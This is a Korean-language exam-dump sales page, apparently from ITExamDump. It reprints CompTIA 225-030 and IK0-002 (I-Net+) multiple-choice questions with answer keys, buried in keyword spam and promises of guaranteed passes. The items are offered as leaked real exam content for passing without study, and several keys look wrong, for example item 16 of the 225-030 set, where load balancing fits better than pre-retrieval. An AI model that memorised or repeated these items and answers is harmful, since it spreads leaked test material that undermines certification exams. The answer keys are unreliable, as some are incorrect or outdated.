Management System (DMS). If 300 applications are received by the Human Resources department per
week, how many images will be scanned per week?
A. 300
B. 360
C. 400
D. 600
Answer: B

CompTIA   225-030덤프   225-030 dump   225-030   225-030최신덤프

NO.14 A document that would address the repurposing or reorganization of staff, the benefits of a new
system, and the increased market value of staff due to new skills is called a:
A. cultural change management plan.
B. project management plan.
C. human resource plan.
D. project objectives document.
Answer:A

CompTIA시험문제   225-030시험문제   225-030 pdf   225-030   225-030 dump

NO.15 A proposed scanner uses TIFF Group 4 compression. What will be the average size of a black and
white A4 sized
(8.5
inches x 11 inches or 216 mm x 279 mm) document at 600 dpi (24 dots per mm)?
A.
50 K bytes
B.
180 K bytes
C.
210 K bytes
D.
380 K bytes
Answer: C

CompTIA덤프   225-030   225-030시험문제   225-030   225-030   225-030

NO.16 A company has a single call center. It will introduce new products that will increase customer service
calls. The company wants to handle an increasing number of calls without adding personnel or
decreasing customer service levels. Which aspect of workflow technology should it consider?
A. Pre-retrieval of customer folders
B. Sorting of documents in a work queue
C. Load balancing
D. Work monitoring
Answer:A

CompTIA   225-030   225-030자격증   225-030 dumps   225-030최신덤프

NO.17 When reviewing potential software choices to propose to a client, the MOST important aspect to
consider from the following is:
A. the price of the potential software solution.
B. how well the software meets the clients needs.
C. the cost of the annual maintenance agreement of the software.
D. how robust the software is.
Answer: B

CompTIA자격증   225-030   225-030   225-030자격증   225-030자격증   225-030덤프

NO.18 During discovery phase interviews with key personnel, a previously unknown critical document type is
identified. What should the next step be?
A. Ignore the document type in order to avoid scope creep
B. Include the document type in the project scope
C. Document the discovery and complete a change order request form
D. Discuss alternatives to including the document type
Answer: B

CompTIA   225-030   225-030 dumps   225-030   225-030

NO.19 A company is required to create a training class for a proposed Electronic Document Management
System (EDMS). All of the following factors would be considered for end-user training EXCEPT:
A. the assessed skill level of individuals.
B. the document management needs of the organization.
C. the architecture of the network.
D. the current manual processes regarding documents.
Answer: C

CompTIA덤프   225-030인증   225-030최신덤프   225-030   225-030 pdf

NO.20 While validating requirements, it becomes apparent that multiple solutions could fit the customers
needs. The consultant should:
A. pick the solution they feel is best suited.
B. choose the least expensive option in terms of price to help win the business.
C. present the alternatives to the customer for discussion.
D. pick the most feature rich solution.
Answer: C

CompTIA   225-030 dumps   225-030   225-030자격증

ITexamdump의 NS0-155덤프의 VCE테스트프로그램과 NS0-145덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 FCNSP.v5시험에 대비한 고품질 덤프와 70-481시험 최신버전덤프를 제공해드립니다. 최고품질 VCP510-DT시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.

시험자료링크: http://www.itexamdump.com/225-030.html

IK0-002 덤프 CompTIA 인증 시험

ITExamDump는 IT인증관련덤프를 제공하는 최고의 업체입니다, 덤프들은 ITExamDump의 베터랑의 전문가들이 오랜 풍부한 경험과 IT지식으로 만들어낸 최고의 제품입니다. 그리고 우리는 온라인무료 서비스도 제공되어 제일 빠른 시간에 소통 상담이 가능합니다.

수많은CompTIA인증 IK0-002시험공부자료중에서ITExamDump의CompTIA인증 IK0-002덤프가 가장 출중한 원인은 무엇일가요? ITExamDump의CompTIA인증 IK0-002덤프는 실제시험문제의 출제방향을 연구하여 IT전문가로 되어있는 덤프제작팀이 만든 최신버전 덤프입니다. ITExamDump의CompTIA인증 IK0-002덤프가 있으면 힘든CompTIA인증 IK0-002시험이 쉬어져서 자격증을 제일 빠른 시간내에 취득할수 있습니다.제일 어려운 시험을 제일 간단한 방법으로 패스하는 방법은ITExamDump의CompTIA인증 IK0-002덤프로 시험준비 공부를 하는것입니다.

IK0-002인증시험은CompTIA사의 인중시험입니다.CompTIA인증사의 시험을 패스한다면 it업계에서의 대우는 달라집니다. 때문에 점점 많은 분들이CompTIA인증IK0-002시험을 응시합니다.하지만 실질적으로IK0-002시험을 패스하시는 분들은 너무 적습니다.전분적인 지식을 터득하면서 완벽한 준비하고 응시하기에는 너무 많은 시간이 필요합니다.하지만 우리ITExamDump는 이러한 여러분의 시간을 절약해드립니다.

ITExamDump의 CompTIA인증 IK0-002덤프를 구매하시고 공부하시면 밝은 미래를 예약한것과 같습니다. ITExamDump의 CompTIA인증 IK0-002덤프는 고객님이 시험에서 통과하여 중요한 IT인증자격증을 취득하게끔 도와드립니다. IT인증자격증은 국제적으로 인정받기에 취직이나 승진 혹은 이직에 힘을 가해드립니다. 학원공부나 다른 시험자료가 필요없이ITExamDump의 CompTIA인증 IK0-002덤프만 공부하시면CompTIA인증 IK0-002시험을 패스하여 자격증을 취득할수 있습니다.

CompTIA IK0-002인증시험을 패스하려면 시험대비자료선택은 필수입니다. 우리ITExamDump에서는 빠른 시일 내에CompTIA IK0-002관련 자료를 제공할 수 있습니다. ITExamDump의 전문가들은 모두 경험도 많고, 그들이 연구자료는 실제시험의 문제와 답과 거이 일치합니다. ITExamDump 는 인증시험에 참가하는 분들한테 편리를 제공하는 사이트이며,여러분들이 시험패스에 도움을 줄 수 있는 사이트입니다.

ITExamDump의CompTIA인증 IK0-002덤프의 인지도는 아주 높습니다. 인지도 높은 원인은CompTIA인증 IK0-002덤프의 시험적중율이 높고 가격이 친근하고 구매후 서비스가 끝내주기 때문입니다. ITExamDump의CompTIA인증 IK0-002덤프로CompTIA인증 IK0-002시험에 도전해보세요.

시험 번호/코드: IK0-002
시험 이름: CompTIA (I-NET+ CERTIFICATION)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 221 문항
업데이트: 2013-12-30

ITExamDump의 CompTIA IK0-002덤프를 구매하기전 우선 pdf버전 덤프샘플을 다운받아 덤프문제를 공부해보시면ITExamDump덤프품질에 신뢰가 느껴질것입니다. ITExamDump의 CompTIA IK0-002덤프가 고객님의 시험패스테 조금이나마 도움이 되신다면 행복으로 느끼겠습니다.

IK0-002 덤프무료샘플다운로드하기: http://www.itexamdump.com/IK0-002.html

NO.1 What is the default port for Telnet?
A. 21
B. 23
C. 25
D. 80
Answer: B

CompTIA   IK0-002 dump   IK0-002

NO.2 Your company has heterogeneous systems (different operating systems/machines). You want to have
a better security and you want your company to issue certificates for user communication. What server
should you implement?
A. Directory server
B. Certificate server C. Authentication server
D. Telnet server
Answer: B

CompTIA   IK0-002기출문제   IK0-002기출문제

NO.3 What UART chip is needed to provide a modem connection of 115200 bps?
A. 85.xx
B. 65.xx
C. 100.xx
D. 165.xx
Answer: D

CompTIA pdf   IK0-002시험문제   IK0-002   IK0-002자료

NO.4 Web graphics 40mm x 60mm. Which format do you load to achieve the fastest download when user
browses?
A. 72dpi
B. 98dpi
C. 100dpi
D. 300dpi
Answer: A

CompTIA   IK0-002자료   IK0-002   IK0-002   IK0-002

NO.5 What uses vector graphics to display web images?
A. Flash
B. Shockwave
C. Real Media D. QuickTime VR
Answer: A

CompTIA dump   IK0-002 pdf   IK0-002자료   IK0-002

NO.6 What network device enables you to communicate with other systems using different protocol?
A. Router
B. Hub
C. Bridge
D. Gateway
Answer: D

CompTIA덤프   IK0-002최신덤프   IK0-002시험문제   IK0-002   IK0-002

NO.7 When a new idea is being considered for adoption regarding the Internet, it is first posted as an:
A. FAQ
B. RFC
C. PDP
D. PDF
Answer: B

CompTIA기출문제   IK0-002자료   IK0-002

NO.8 Which device cannot be infected with a virus?
A. Router
B. Hub
C. Gateway D. NIC
Answer: B

CompTIA dump   IK0-002최신덤프   IK0-002   IK0-002 dumps   IK0-002   IK0-002덤프

NO.9 What do you call the first DNS server?
A. First
B. Master
C. Slave
D. Primary
Answer: D

CompTIA   IK0-002기출문제   IK0-002   IK0-002

NO.10 Which command matches IP address to MAC address?
A. arp
B. ipconfig
C. winipcfg
D. nbtstat
Answer: A

CompTIA자격증   IK0-002 pdf   IK0-002 dumps   IK0-002

NO.11 Which is not a required HTML Tag?
A. <TEXTAREA>
B. <Body>
C. <Head>
D. <HTML>
Answer: A

CompTIA   IK0-002   IK0-002시험문제   IK0-002

NO.12 How are cookies stored?
A. Unencrypted text file on client
B. Unencrypted text file on server
C. Encrypted text file on client
D. Encrypted text file on server
Answer: A

CompTIA dump   IK0-002   IK0-002   IK0-002인증   IK0-002기출문제   IK0-002시험문제

NO.13 What is the default port for FTP?
A. 21
B. 25
C. 80
D. 110
Answer: A

CompTIA   IK0-002   IK0-002기출문제   IK0-002   IK0-002

NO.14 Which command checks the current open TCP/IP connections?
A. netstat
B. Ping
C. ipconfig
D. winipcfg
Answer: A

CompTIA   IK0-002 dump   IK0-002   IK0-002인증   IK0-002

NO.15 What is the default port for HTTP?
A. 21
B. 25
C. 80
D. 110
Answer: C

CompTIA   IK0-002   IK0-002

NO.16 Which supports animation of graphics on web?
A. GIF87A
B. GIF89A
C. jpeg
D. png
Answer: B

CompTIA자료   IK0-002   IK0-002   IK0-002최신덤프

NO.17 Which supports encryption?
A. UDP
B. TCP
C. PPP
D. SLIP
Answer: C

CompTIA   IK0-002덤프   IK0-002

NO.18 What TCP/IP utility is used to see current contents of a packet on your computer?
A. tracert
B. protocol analyzer
C. ping
D. ipconfig
Answer: B

CompTIA   IK0-002기출문제   IK0-002   IK0-002 dump

NO.19 What is the default port for SMTP?
A. 21
B. 25
C. 80
D. 110
Answer: B

CompTIA   IK0-002   IK0-002자격증   IK0-002자료

NO.20 You have a Remote access server (RAS) used by your colleagues working at home. You are
concerned about the security. What should you do to have a better security measure?
A. Installing firewall
B. Change password
C. Use SSL for the connection
D. Enable call back
Answer: D

CompTIA dumps   IK0-002자격증   IK0-002   IK0-002   IK0-002최신덤프

NO.21 What are the best types of documents to distribute using Electronic Data Interchange (EDI)?
A. Memos
B. Orders and invoices
C. Reports
Answer: B

CompTIA   IK0-002   IK0-002   IK0-002   IK0-002덤프

NO.22 Your company has connection with the business partners. What is it called?
A. Intranet
B. Extranet
C. Internet
D. Private network
Answer: B

CompTIA최신덤프   IK0-002덤프   IK0-002   IK0-002덤프   IK0-002 pdf

NO.23 Which one has speeds off 51.84Mbps?
A. T1
B. T3
C. OC1
D. OC3
Answer: C

CompTIA dumps   IK0-002덤프   IK0-002

NO.24 When a system is sent ICMP echo requests repeatedly, it is a
A. PING attack
B. SYN attack
C. SPOOFING
D. Telnet attack
Answer: A

CompTIA   IK0-002   IK0-002   IK0-002시험문제   IK0-002   IK0-002최신덤프

NO.25 What TCP/IP protocol can be used for directory access?
A. LDAP
B. HTTP
C. FTP
D. NNTP
Answer: A

CompTIA   IK0-002최신덤프   IK0-002   IK0-002

NO.26 Which executes on server side?
A. CGI
B. C++
C. JavaScript
D. VBG
Answer: A

CompTIA dump   IK0-002   IK0-002시험문제   IK0-002 pdf   IK0-002인증

NO.27 Within a DNS record where can you find the name of the administrator.
A. PTR
B. SOA
C. CNAME
D. MX
Answer: B

CompTIA기출문제   IK0-002자격증   IK0-002   IK0-002   IK0-002시험문제

NO.28 Which DNS record tells you mail servers?
A. PTR
B. RP
C. CNAME
D. MX
Answer: D

CompTIA   IK0-002   IK0-002   IK0-002   IK0-002 dump

NO.29 How many 64 Kbps channels are in a ISDN?
A. 1
B. 2
C. 8
D. 12
Answer: B

CompTIA dump   IK0-002   IK0-002 dump   IK0-002   IK0-002기출문제   IK0-002

NO.30 What do you need on your e-commerce system to process credit card transactions?
A. Online catalog
B. Virtual shopping carts/Checkouts
C. Merchant system
D. Intranet
Answer: C

CompTIA인증   IK0-002   IK0-002

ITexamdump의 EN0-001덤프의 VCE테스트프로그램과 MB5-858덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 00M-624시험에 대비한 고품질 덤프와 70-688시험 최신버전덤프를 제공해드립니다. 최고품질 BAS-004시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.

시험자료링크: http://www.itexamdump.com/IK0-002.html